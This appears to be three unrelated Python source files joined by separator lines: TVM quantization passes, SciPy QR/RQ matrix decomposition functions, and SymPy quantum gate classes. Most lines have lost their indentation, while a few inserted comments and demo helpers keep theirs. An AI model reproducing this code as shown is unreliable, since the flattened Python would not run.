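# 7 and valid_range is 2**7 = 128, so dom_scale = 4.0 / 128 = 0.03125 and
# the clip bounds are -127 and 127.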
def realize():
"""The realize pass will transform the simulated quantized graph, which
actually computes with float32, to a real low-bit integer graph. It will
replace the `simulated_quantize` with several fine-grained operators like
add, multiply, and shift as much as possible for better performance.
Returns
-------
ret: tvm.relay.Pass
The registered pass for quantization realization.
"""
return _quantize.QuantizeRealize()
def _bind_params(func, params):
"""Bind the params to the expression.
"""
name_dict = {}
for arg in func.params:
name = arg.name_hint
if name in name_dict:
name_dict[name] = None
else:
name_dict[name] = arg
bind_dict = {}
for k, v in params.items():
if k not in name_dict:
continue
arg = name_dict[k]
if arg is None:
raise ValueError("Multiple args in the function have name %s" % k)
bind_dict[arg] = _expr.const(v)
return _expr.bind(func, bind_dict)
def prerequisite_optimize(graph, params=None):
""" Prerequisite optimization passes for quantization. Perform
"SimplifyInference", "FoldScaleAxis", "FoldConstant", and
"CanonicalizeOps" optimization before quantization. """
optimize = _transform.Sequential([_transform.SimplifyInference(),
_transform.FoldConstant(),
_transform.FoldScaleAxis(),
_transform.CanonicalizeOps(),
_transform.FoldConstant()])
if params:
graph = _bind_params(graph, params)
mod = _module.Module.from_expr(graph)
with _transform.PassContext(opt_level=3):
mod = optimize(mod)
return mod["main"]
def quantize(graph, params=None, dataset=None):
""" The quantization procedure. Before running the three main
procedure of quantization, "annotate", "calibrate" and "realize"
, we need to do "SimplifyInference", "FoldScaleAxis", "FoldConstant"
first for optimizing.
Parameters
    ----------
graph: Function
The original graph.
params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
dataset: list of dict of Var -> NDArray
The calibration dataset.
Returns
-------
ret: Function
The graph after quantization
"""
graph = prerequisite_optimize(graph, params)
mod = _module.Module.from_expr(graph)
calibrate_pass = _transform.function_pass(calibrate, opt_level=1,
name="QuantizeCalibrate")
quant_passes = [partition(),
annotate(),
calibrate_pass]
if not current_qconfig().do_simulation:
quant_passes.append(realize())
quant_passes.append(_transform.FoldConstant())
quantize_seq = _transform.Sequential(quant_passes)
with _transform.PassContext(opt_level=3,
required_pass=["QuantizeAnnotate",
"QuantizeCalibrate",
"QuantizeRealize"]):
with quantize_context():
mod = quantize_seq(mod)
return mod["main"]
|
|
"""QR decomposition functions."""
import numpy
from numpy import asarray_chkfinite
# Local imports
import special_matrices
from blas import get_blas_funcs
from lapack import get_lapack_funcs, find_best_lapack_type
from misc import _datacopied
def qr(a, overwrite_a=False, lwork=None, mode='full'):
"""Compute QR decomposition of a matrix.
Calculate the decomposition :lm:`A = Q R` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : array, shape (M, N)
Matrix to be decomposed
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
lwork : int, optional
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic'}
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes).
Returns
-------
Q : double or complex ndarray
Of shape (M, M), or (M, K) for ``mode='economic'``. Not returned if
``mode='r'``.
R : double or complex ndarray
Of shape (M, N), or (K, N) for ``mode='economic'``. ``K = min(M, N)``.
Raises LinAlgError if decomposition fails
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dorgqr, and zungqr.
    If ``mode='economic'``, the shapes of Q and R are (M, K) and (K, N) instead
of (M,M) and (M,N), with ``K=min(M,N)``.
Examples
--------
>>> from scipy import random, linalg, dot, allclose
>>> a = random.randn(9, 6)
>>> q, r = linalg.qr(a)
>>> allclose(a, dot(q, r))
True
>>> q.shape, r.shape
((9, 9), (9, 6))
>>> r2 = linalg.qr(a, mode='r')
>>> allclose(r, r2)
True
>>> q3, r3 = linalg.qr(a, mode='economic')
>>> q3.shape, r3.shape
((9, 6), (6, 6))
"""
if mode == 'qr':
# 'qr' was the old default, equivalent to 'full'. Neither 'full' nor
# 'qr' are used below, but set to 'full' anyway to be sure
mode = 'full'
    if mode not in ['full', 'qr', 'r', 'economic']:
        raise ValueError(
            "Mode argument should be one of ['full', 'r', 'economic']")
a1 = asarray_chkfinite(a)
if len(a1.shape) != 2:
raise ValueError("expected 2D array")
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
geqrf, = get_lapack_funcs(('geqrf',), (a1,))
if lwork is None or lwork == -1:
# get optimal work array
qr, tau, work, info = geqrf(a1, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
qr, tau, work, info = geqrf(a1, lwork=lwork, overwrite_a=overwrite_a)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal geqrf"
% -info)
if not mode == 'economic' or M < N:
R = special_matrices.triu(qr)
else:
R = special_matrices.triu(qr[0:N, 0:N])
if mode == 'r':
return R
if find_best_lapack_type((a1,))[0] in ('s', 'd'):
gor_un_gqr, = get_lapack_funcs(('orgqr',), (qr,))
else:
gor_un_gqr, = get_lapack_funcs(('ungqr',), (qr,))
if M < N:
# get optimal work array
Q, work, info = gor_un_gqr(qr[:,0:M], tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_gqr(qr[:,0:M], tau, lwork=lwork, overwrite_a=1)
elif mode == 'economic':
# get optimal work array
Q, work, info = gor_un_gqr(qr, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_gqr(qr, tau, lwork=lwork, overwrite_a=1)
else:
t = qr.dtype.char
qqr = numpy.empty((M, M), dtype=t)
qqr[:,0:N] = qr
# get optimal work array
Q, work, info = gor_un_gqr(qqr, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_gqr(qqr, tau, lwork=lwork, overwrite_a=1)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal gorgqr"
% -info)
return Q, R
def qr_old(a, overwrite_a=False, lwork=None):
"""Compute QR decomposition of a matrix.
Calculate the decomposition :lm:`A = Q R` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : array, shape (M, N)
Matrix to be decomposed
overwrite_a : boolean
Whether data in a is overwritten (may improve performance)
lwork : integer
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
Returns
-------
Q : double or complex array, shape (M, M)
R : double or complex array, shape (M, N)
Size K = min(M, N)
Raises LinAlgError if decomposition fails
"""
a1 = asarray_chkfinite(a)
if len(a1.shape) != 2:
raise ValueError('expected matrix')
M,N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
geqrf, = get_lapack_funcs(('geqrf',), (a1,))
if lwork is None or lwork == -1:
# get optimal work array
qr, tau, work, info = geqrf(a1, lwork=-1, overwrite_a=1)
lwork = work[0]
qr, tau, work, info = geqrf(a1, lwork=lwork, overwrite_a=overwrite_a)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal geqrf'
% -info)
gemm, = get_blas_funcs(('gemm',), (qr,))
t = qr.dtype.char
R = special_matrices.triu(qr)
Q = numpy.identity(M, dtype=t)
ident = numpy.identity(M, dtype=t)
zeros = numpy.zeros
for i in range(min(M, N)):
v = zeros((M,), t)
v[i] = 1
v[i+1:M] = qr[i+1:M, i]
H = gemm(-tau[i], v, v, 1, ident, trans_b=2)
Q = gemm(1, Q, H)
return Q, R
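# The loop in qr_old accumulates Q as a product of Householder reflectors
# H_i = I - tau[i] * v_i v_i^H (trans_b=2 in the gemm call takes the
# conjugate transpose of b). A rough numpy equivalent for the real case,
# assuming `qr` and `tau` as returned by geqrf:
#
#   Q = numpy.identity(M)
#   for i in range(min(M, N)):
#       v = numpy.zeros(M)
#       v[i] = 1.0
#       v[i+1:] = qr[i+1:, i]
#       Q = Q.dot(numpy.identity(M) - tau[i] * numpy.outer(v, v))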
def rq(a, overwrite_a=False, lwork=None, mode='full'):
"""Compute RQ decomposition of a square real matrix.
Calculate the decomposition :lm:`A = R Q` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
    a : array, shape (M, N)
Matrix to be decomposed
overwrite_a : boolean
Whether data in a is overwritten (may improve performance)
lwork : integer
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic'}
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes).
Returns
-------
R : double array, shape (M, N)
Q : double or complex array, shape (M, M)
Raises LinAlgError if decomposition fails
Examples
--------
>>> from scipy import linalg
>>> from numpy import random, dot, allclose
>>> a = random.randn(6, 9)
>>> r, q = linalg.rq(a)
>>> allclose(a, dot(r, q))
True
>>> r.shape, q.shape
((6, 9), (9, 9))
>>> r2 = linalg.rq(a, mode='r')
>>> allclose(r, r2)
True
>>> r3, q3 = linalg.rq(a, mode='economic')
>>> r3.shape, q3.shape
((6, 6), (6, 9))
"""
    if mode not in ['full', 'r', 'economic']:
        raise ValueError(
            "Mode argument should be one of ['full', 'r', 'economic']")
a1 = asarray_chkfinite(a)
if len(a1.shape) != 2:
raise ValueError('expected matrix')
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
gerqf, = get_lapack_funcs(('gerqf',), (a1,))
if lwork is None or lwork == -1:
# get optimal work array
rq, tau, work, info = gerqf(a1, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
rq, tau, work, info = gerqf(a1, lwork=lwork, overwrite_a=overwrite_a)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal gerqf'
% -info)
if not mode == 'economic' or N < M:
R = special_matrices.triu(rq, N-M)
else:
R = special_matrices.triu(rq[-M:, -M:])
if mode == 'r':
return R
if find_best_lapack_type((a1,))[0] in ('s', 'd'):
gor_un_grq, = get_lapack_funcs(('orgrq',), (rq,))
else:
gor_un_grq, = get_lapack_funcs(('ungrq',), (rq,))
if N < M:
# get optimal work array
Q, work, info = gor_un_grq(rq[-N:], tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_grq(rq[-N:], tau, lwork=lwork, overwrite_a=1)
elif mode == 'economic':
# get optimal work array
Q, work, info = gor_un_grq(rq, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_grq(rq, tau, lwork=lwork, overwrite_a=1)
else:
rq1 = numpy.empty((N, N), dtype=rq.dtype)
rq1[-M:] = rq
# get optimal work array
Q, work, info = gor_un_grq(rq1, tau, lwork=-1, overwrite_a=1)
lwork = work[0].real.astype(numpy.int)
Q, work, info = gor_un_grq(rq1, tau, lwork=lwork, overwrite_a=1)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal orgrq"
% -info)
return R, Q
|
|
"""An implementation of gates that act on qubits.
Gates are unitary operators that act on the space of qubits.
Medium Term Todo:
* Optimize Gate._apply_operators_Qubit to remove the creation of many
intermediate Qubit objects.
* Add commutation relationships to all operators and use this in gate_sort.
* Fix gate_sort and gate_simp.
* Get multi-target UGates plotting properly.
* Get UGate to work with either sympy/numpy matrices and output either
format. This should also use the matrix slots.
"""
from itertools import chain
import random
from sympy import Add, I, Integer, Matrix, Mul, Pow, sqrt, Tuple
from sympy.core.numbers import Number
from sympy.core.compatibility import is_sequence
from sympy.printing.pretty.stringpict import prettyForm, stringPict
from sympy.physics.quantum.anticommutator import AntiCommutator
from sympy.physics.quantum.commutator import Commutator
from sympy.physics.quantum.qexpr import QuantumError
from sympy.physics.quantum.hilbert import ComplexSpace
from sympy.physics.quantum.operator import (UnitaryOperator, Operator,
HermitianOperator)
from sympy.physics.quantum.matrixutils import matrix_tensor_product, matrix_eye
from sympy.physics.quantum.matrixcache import matrix_cache
from sympy.matrices.matrices import MatrixBase
__all__ = [
'Gate',
'CGate',
'UGate',
'OneQubitGate',
'TwoQubitGate',
'IdentityGate',
'HadamardGate',
'XGate',
'YGate',
'ZGate',
'TGate',
'PhaseGate',
'SwapGate',
'CNotGate',
# Aliased gate names
'CNOT',
'SWAP',
'H',
'X',
'Y',
'Z',
'T',
'S',
'Phase',
'normalized',
'gate_sort',
'gate_simp',
'random_circuit',
]
#-----------------------------------------------------------------------------
# Gate Super-Classes
#-----------------------------------------------------------------------------
_normalized = True
def normalized(normalize):
"""Should Hadamard gates be normalized by a 1/sqrt(2).
This is a global setting that can be used to simplify the look of various
    expressions, by leaving off the leading 1/sqrt(2) of the Hadamard gate.
Parameters
----------
normalize : bool
Should the Hadamard gate include the 1/sqrt(2) normalization factor?
When True, the Hadamard gate will have the 1/sqrt(2). When False, the
Hadamard gate will not have this factor.
"""
global _normalized
_normalized = normalize
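# Usage sketch: the flag is consulted by HadamardGate.get_target_matrix
# below, so flipping it changes the matrix that subsequent Hadamard gates
# report:
#
#   normalized(False)   # H matrices omit the leading 1/sqrt(2)
#   normalized(True)    # restore the default, normalized form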
def _validate_targets_controls(tandc):
tandc = list(tandc)
# Check for integers
for bit in tandc:
if not bit.is_Integer:
            raise TypeError('Integer expected, got: %r' % bit)
# Detect duplicates
if len(list(set(tandc))) != len(tandc):
raise QuantumError(
'Target/control qubits in a gate cannot be duplicated'
)
class Gate(UnitaryOperator):
"""Non-controlled unitary gate operator that acts on qubits.
This is a general abstract gate that needs to be subclassed to do anything
useful.
Parameters
----------
label : tuple, int
A list of the target qubits (as ints) that the gate will apply to.
Examples
--------
"""
_label_separator = ','
gate_name = u'G'
gate_name_latex = u'G'
#-------------------------------------------------------------------------
# Initialization/creation
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
args = Tuple(*UnitaryOperator._eval_args(args))
_validate_targets_controls(args)
return args
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**(max(args)+1)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def nqubits(self):
"""The total number of qubits this gate acts on.
For controlled gate subclasses this includes both target and control
        qubits, so that, for example, the CNOT gate acts on 2 qubits.
"""
return len(self.targets)
@property
def min_qubits(self):
"""The minimum number of qubits this gate needs to act on."""
return max(self.targets)+1
@property
def targets(self):
"""A tuple of target qubits."""
return self.label
@property
def gate_name_plot(self):
return r'$%s$' % self.gate_name_latex
#-------------------------------------------------------------------------
# Gate methods
#-------------------------------------------------------------------------
def get_target_matrix(self, format='sympy'):
"""The matrix rep. of the target part of the gate.
Parameters
----------
format : str
The format string ('sympy','numpy', etc.)
"""
raise NotImplementedError('get_target_matrix is not implemented in Gate.')
#-------------------------------------------------------------------------
# Apply
#-------------------------------------------------------------------------
def _apply_operator_IntQubit(self, qubits, **options):
"""Redirect an apply from IntQubit to Qubit"""
return self._apply_operator_Qubit(qubits, **options)
def _apply_operator_Qubit(self, qubits, **options):
"""Apply this gate to a Qubit."""
# Check number of qubits this gate acts on.
if qubits.nqubits < self.min_qubits:
raise QuantumError(
'Gate needs a minimum of %r qubits to act on, got: %r' %\
(self.min_qubits, qubits.nqubits)
)
# If the controls are not met, just return
if isinstance(self, CGate):
if not self.eval_controls(qubits):
return qubits
targets = self.targets
target_matrix = self.get_target_matrix(format='sympy')
# Find which column of the target matrix this applies to.
column_index = 0
n = 1
for target in targets:
column_index += n*qubits[target]
n = n<<1
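        # Example: for targets=(0, 2) with qubits[0]=1 and qubits[2]=1, the
        # loop above gives column_index = 1*1 + 1*2 = 3; the target bits are
        # read as a little-endian binary number.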
column = target_matrix[:,int(column_index)]
# Now apply each column element to the qubit.
result = 0
for index in range(column.rows):
# TODO: This can be optimized to reduce the number of Qubit
# creations. We should simply manipulate the raw list of qubit
# values and then build the new Qubit object once.
# Make a copy of the incoming qubits.
new_qubit = qubits.__class__(*qubits.args)
# Flip the bits that need to be flipped.
for bit in range(len(targets)):
if new_qubit[targets[bit]] != (index>>bit)&1:
new_qubit = new_qubit.flip(targets[bit])
# The value in that row and column times the flipped-bit qubit
# is the result for that part.
result += column[index]*new_qubit
return result
#-------------------------------------------------------------------------
# Represent
#-------------------------------------------------------------------------
def _represent_default_basis(self, **options):
return self._represent_ZGate(None, **options)
def _represent_ZGate(self, basis, **options):
format = options.get('format','sympy')
nqubits = options.get('nqubits',0)
if nqubits == 0:
raise QuantumError('The number of qubits must be given as nqubits.')
# Make sure we have enough qubits for the gate.
if nqubits < self.min_qubits:
raise QuantumError(
'The number of qubits %r is too small for the gate.' % nqubits
)
target_matrix = self.get_target_matrix(format)
targets = self.targets
if isinstance(self, CGate):
controls = self.controls
else:
controls = []
m = represent_zbasis(
controls, targets, target_matrix, nqubits, format
)
return m
#-------------------------------------------------------------------------
# Print methods
#-------------------------------------------------------------------------
def _print_contents(self, printer, *args):
label = self._print_label(printer, *args)
return '%s(%s)' % (self.gate_name, label)
def _print_contents_pretty(self, printer, *args):
a = stringPict(unicode(self.gate_name))
b = self._print_label_pretty(printer, *args)
return self._print_subscript_pretty(a, b)
def _print_contents_latex(self, printer, *args):
label = self._print_label(printer, *args)
return '%s_{%s}' % (self.gate_name_latex, label)
def plot_gate(self, axes, gate_idx, gate_grid, wire_grid):
raise NotImplementedError('plot_gate is not implemented.')
class CGate(Gate):
"""A general unitary gate with control qubits.
A general control gate applies a target gate to a set of targets if all
of the control qubits have a particular values (set by
``CGate.control_value``).
Parameters
----------
label : tuple
The label in this case has the form (controls, gate), where controls
is a tuple/list of control qubits (as ints) and gate is a ``Gate``
instance that is the target operator.
Examples
--------
"""
gate_name = u'C'
gate_name_latex = u'C'
# The values this class controls for.
control_value = Integer(1)
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
# _eval_args has the right logic for the controls argument.
controls = args[0]
gate = args[1]
if not is_sequence(controls):
controls = (controls,)
controls = UnitaryOperator._eval_args(controls)
_validate_targets_controls(chain(controls,gate.targets))
return (Tuple(*controls), gate)
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**max(max(args[0])+1,args[1].min_qubits)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def nqubits(self):
"""The total number of qubits this gate acts on.
For controlled gate subclasses this includes both target and control
        qubits, so that, for example, the CNOT gate acts on 2 qubits.
"""
return len(self.targets)+len(self.controls)
@property
def min_qubits(self):
"""The minimum number of qubits this gate needs to act on."""
return max(max(self.controls),max(self.targets))+1
@property
def targets(self):
"""A tuple of target qubits."""
return self.gate.targets
@property
def controls(self):
"""A tuple of control qubits."""
return tuple(self.label[0])
@property
def gate(self):
"""The non-controlled gate that will be applied to the targets."""
return self.label[1]
#-------------------------------------------------------------------------
# Gate methods
#-------------------------------------------------------------------------
def get_target_matrix(self, format='sympy'):
return self.gate.get_target_matrix(format)
def eval_controls(self, qubit):
"""Return True/False to indicate if the controls are satisfied."""
return all(qubit[bit]==self.control_value for bit in self.controls)
def decompose(self, **options):
"""Decompose the controlled gate into CNOT and single qubits gates."""
if len(self.controls) == 1:
c = self.controls[0]
t = self.gate.targets[0]
if isinstance(self.gate, YGate):
g1 = PhaseGate(t)
g2 = CNotGate(c, t)
g3 = PhaseGate(t)
g4 = ZGate(t)
return g1*g2*g3*g4
if isinstance(self.gate, ZGate):
g1 = HadamardGate(t)
g2 = CNotGate(c, t)
g3 = HadamardGate(t)
return g1*g2*g3
else:
return self
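    # Illustrative decompose example: with a single control, a controlled-Z
    # becomes a Hadamard-conjugated CNOT per the ZGate branch above, e.g.
    # CGate(1, ZGate(0)).decompose() gives
    # HadamardGate(0)*CNotGate(1, 0)*HadamardGate(0).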
#-------------------------------------------------------------------------
# Print methods
#-------------------------------------------------------------------------
def _print_contents(self, printer, *args):
controls = self._print_sequence(self.controls, ',', printer, *args)
gate = printer._print(self.gate, *args)
return '%s((%s),%s)' %\
(self.gate_name, controls, gate)
def _print_contents_pretty(self, printer, *args):
controls = self._print_sequence_pretty(self.controls, ',', printer, *args)
gate = printer._print(self.gate)
gate_name = stringPict(unicode(self.gate_name))
first = self._print_subscript_pretty(gate_name, controls)
gate = self._print_parens_pretty(gate)
final = prettyForm(*first.right((gate)))
return final
def _print_contents_latex(self, printer, *args):
controls = self._print_sequence(self.controls, ',', printer, *args)
gate = printer._print(self.gate, *args)
return r'%s_{%s}{\left(%s\right)}' %\
(self.gate_name_latex, controls, gate)
def plot_gate(self, circ_plot, gate_idx):
min_wire = int(min(chain(self.controls, self.targets)))
max_wire = int(max(chain(self.controls, self.targets)))
circ_plot.control_line(gate_idx, min_wire, max_wire)
for c in self.controls:
circ_plot.control_point(gate_idx, int(c))
self.gate.plot_gate(circ_plot, gate_idx)
class UGate(Gate):
"""General gate specified by a set of targets and a target matrix.
Parameters
----------
label : tuple
A tuple of the form (targets, U), where targets is a tuple of the
        target qubits and U is a unitary matrix of dimension
        2**len(targets).
"""
gate_name = u'U'
gate_name_latex = u'U'
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
targets = args[0]
if not is_sequence(targets):
targets = (targets,)
targets = Gate._eval_args(targets)
_validate_targets_controls(targets)
mat = args[1]
if not isinstance(mat, MatrixBase):
raise TypeError('Matrix expected, got: %r' % mat)
dim = 2**len(targets)
if not all(dim == shape for shape in mat.shape):
raise IndexError(
'Number of targets must match the matrix size: %r %r' %\
(targets, mat)
)
return (targets, mat)
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**(max(args[0])+1)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def targets(self):
"""A tuple of target qubits."""
return tuple(self.label[0])
#-------------------------------------------------------------------------
# Gate methods
#-------------------------------------------------------------------------
def get_target_matrix(self, format='sympy'):
"""The matrix rep. of the target part of the gate.
Parameters
----------
format : str
The format string ('sympy','numpy', etc.)
"""
return self.label[1]
#-------------------------------------------------------------------------
# Print methods
#-------------------------------------------------------------------------
def _print_contents(self, printer, *args):
targets = self._print_targets(printer, *args)
return '%s(%s)' % (self.gate_name, targets)
def _print_contents_pretty(self, printer, *args):
targets = self._print_sequence_pretty(self.targets, ',', printer, *args)
gate_name = stringPict(unicode(self.gate_name))
return self._print_subscript_pretty(gate_name, targets)
def _print_contents_latex(self, printer, *args):
targets = self._print_sequence(self.targets, ',', printer, *args)
return r'%s_{%s}' % (self.gate_name_latex, targets)
def plot_gate(self, circ_plot, gate_idx):
circ_plot.one_qubit_box(
self.gate_name_plot,
gate_idx, int(self.targets[0])
)
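# A short, hedged sketch of constructing a UGate; `eye` comes from sympy
# core, which this module already depends on for its matrices:
def _demo_ugate():
    """A UGate whose target matrix is the 2x2 identity, acting on qubit 0."""
    from sympy import eye
    return UGate((0,), eye(2))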
class OneQubitGate(Gate):
"""A single qubit unitary gate base class."""
nqubits = Integer(1)
def plot_gate(self, circ_plot, gate_idx):
circ_plot.one_qubit_box(
self.gate_name_plot,
gate_idx, int(self.targets[0])
)
def _eval_commutator(self, other, **hints):
if isinstance(other, OneQubitGate):
if self.targets != other.targets or self.__class__ == other.__class__:
return Integer(0)
return Operator._eval_commutator(self, other, **hints)
def _eval_anticommutator(self, other, **hints):
if isinstance(other, OneQubitGate):
if self.targets != other.targets or self.__class__ == other.__class__:
return Integer(2)*self*other
return Operator._eval_anticommutator(self, other, **hints)
class TwoQubitGate(Gate):
"""A two qubit unitary gate base class."""
nqubits = Integer(2)
#-----------------------------------------------------------------------------
# Single Qubit Gates
#-----------------------------------------------------------------------------
class IdentityGate(OneQubitGate):
"""The single qubit identity gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'1'
gate_name_latex = u'1'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('eye2', format)
def _eval_commutator(self, other, **hints):
return Integer(0)
def _eval_anticommutator(self, other, **hints):
return Integer(2)*other
class HadamardGate(OneQubitGate):
"""The single qubit Hadamard gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'H'
gate_name_latex = u'H'
def get_target_matrix(self, format='sympy'):
if _normalized:
return matrix_cache.get_matrix('H', format)
else:
return matrix_cache.get_matrix('Hsqrt2', format)
def _eval_commutator_XGate(self, other, **hints):
return I*sqrt(2)*YGate(self.targets[0])
def _eval_commutator_YGate(self, other, **hints):
return I*sqrt(2)*(ZGate(self.targets[0])-XGate(self.targets[0]))
def _eval_commutator_ZGate(self, other, **hints):
return -I*sqrt(2)*YGate(self.targets[0])
def _eval_anticommutator_XGate(self, other, **hints):
return sqrt(2)*IdentityGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(0)
def _eval_anticommutator_ZGate(self, other, **hints):
return sqrt(2)*IdentityGate(self.targets[0])
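# A minimal, hedged sketch of applying the Hadamard gate to a basis state;
# qapply and Qubit live outside this module in sympy.physics.quantum:
def _demo_hadamard():
    """H|0> gives the equal superposition (|0> + |1>)/sqrt(2)."""
    from sympy.physics.quantum.qapply import qapply
    from sympy.physics.quantum.qubit import Qubit
    return qapply(HadamardGate(0)*Qubit('0'))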
class XGate(HermitianOperator, OneQubitGate):
"""The single qubit X, or NOT, gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'X'
gate_name_latex = u'X'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('X', format)
def plot_gate(self, circ_plot, gate_idx):
circ_plot.not_point(
gate_idx, int(self.label[0])
)
def _eval_commutator_YGate(self, other, **hints):
return Integer(2)*I*ZGate(self.targets[0])
def _eval_anticommutator_XGate(self, other, **hints):
return Integer(2)*IdentityGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(0)
def _eval_anticommutator_ZGate(self, other, **hints):
return Integer(0)
class YGate(HermitianOperator, OneQubitGate):
"""The single qubit Y gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'Y'
gate_name_latex = u'Y'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('Y', format)
def _eval_commutator_ZGate(self, other, **hints):
return Integer(2)*I*XGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(2)*IdentityGate(self.targets[0])
def _eval_anticommutator_ZGate(self, other, **hints):
return Integer(0)
class ZGate(HermitianOperator, OneQubitGate):
"""The single qubit Z gate.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'Z'
gate_name_latex = u'Z'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('Z', format)
def _eval_commutator_XGate(self, other, **hints):
return Integer(2)*I*YGate(self.targets[0])
def _eval_anticommutator_YGate(self, other, **hints):
return Integer(0)
class PhaseGate(OneQubitGate):
"""The single qubit phase, or S, gate.
This gate rotates the phase of the state by pi/2 if the state is ``|1>`` and
does nothing if the state is ``|0>``.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'S'
gate_name_latex = u'S'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('S', format)
def _eval_commutator_ZGate(self, other, **hints):
return Integer(0)
def _eval_commutator_TGate(self, other, **hints):
return Integer(0)
class TGate(OneQubitGate):
"""The single qubit pi/8 gate.
This gate rotates the phase of the state by pi/4 if the state is ``|1>`` and
does nothing if the state is ``|0>``.
Parameters
----------
target : int
The target qubit this gate will apply to.
Examples
--------
"""
gate_name = u'T'
gate_name_latex = u'T'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('T', format)
def _eval_commutator_ZGate(self, other, **hints):
return Integer(0)
def _eval_commutator_PhaseGate(self, other, **hints):
return Integer(0)
# Aliases for gate names.
H = HadamardGate
X = XGate
Y = YGate
Z = ZGate
T = TGate
Phase = S = PhaseGate
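# A small sketch of the Pauli relations encoded by the _eval_commutator_*
# and _eval_anticommutator_* methods above (Commutator/AntiCommutator are
# already imported at the top of this module, as gate_sort below shows):
def _demo_pauli_relations():
    """[X, Y] = 2*I*Z and {X, Y} = 0 when acting on the same qubit."""
    comm = Commutator(X(0), Y(0)).doit()      # -> 2*I*Z(0)
    anti = AntiCommutator(X(0), Y(0)).doit()  # -> 0
    return comm, anti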
#-----------------------------------------------------------------------------
# 2 Qubit Gates
#-----------------------------------------------------------------------------
class CNotGate(CGate, TwoQubitGate):
"""Two qubit controlled-NOT.
This gate performs the NOT or X gate on the target qubit if the control
qubits all have the value 1.
Parameters
----------
label : tuple
A tuple of the form (control, target).
Examples
--------
"""
gate_name = 'CNOT'
gate_name_latex = u'CNOT'
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def _eval_args(cls, args):
args = Gate._eval_args(args)
return args
@classmethod
def _eval_hilbert_space(cls, args):
"""This returns the smallest possible Hilbert space."""
return ComplexSpace(2)**(max(args)+1)
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def min_qubits(self):
"""The minimum number of qubits this gate needs to act on."""
return max(self.label)+1
@property
def targets(self):
"""A tuple of target qubits."""
return (self.label[1],)
@property
def controls(self):
"""A tuple of control qubits."""
return (self.label[0],)
@property
def gate(self):
"""The non-controlled gate that will be applied to the targets."""
return XGate(self.label[1])
#-------------------------------------------------------------------------
# Print methods
#-------------------------------------------------------------------------
# The default printing of Gate works better than that of CGate, so we
# bypass the overridden methods in CGate.
def _print_contents(self, printer, *args):
return Gate._print_contents(self, printer, *args)
def _print_contents_pretty(self, printer, *args):
return Gate._print_contents_pretty(self, printer, *args)
def _print_contents_latex(self, printer, *args):
return Gate._print_contents_latex(self, printer, *args)
#-------------------------------------------------------------------------
# Commutator/AntiCommutator
#-------------------------------------------------------------------------
def _eval_commutator_ZGate(self, other, **hints):
"""[CNOT(i, j), Z(i)] == 0."""
if self.controls[0] == other.targets[0]:
return Integer(0)
else:
raise NotImplementedError('Commutator not implemented: %r' % other)
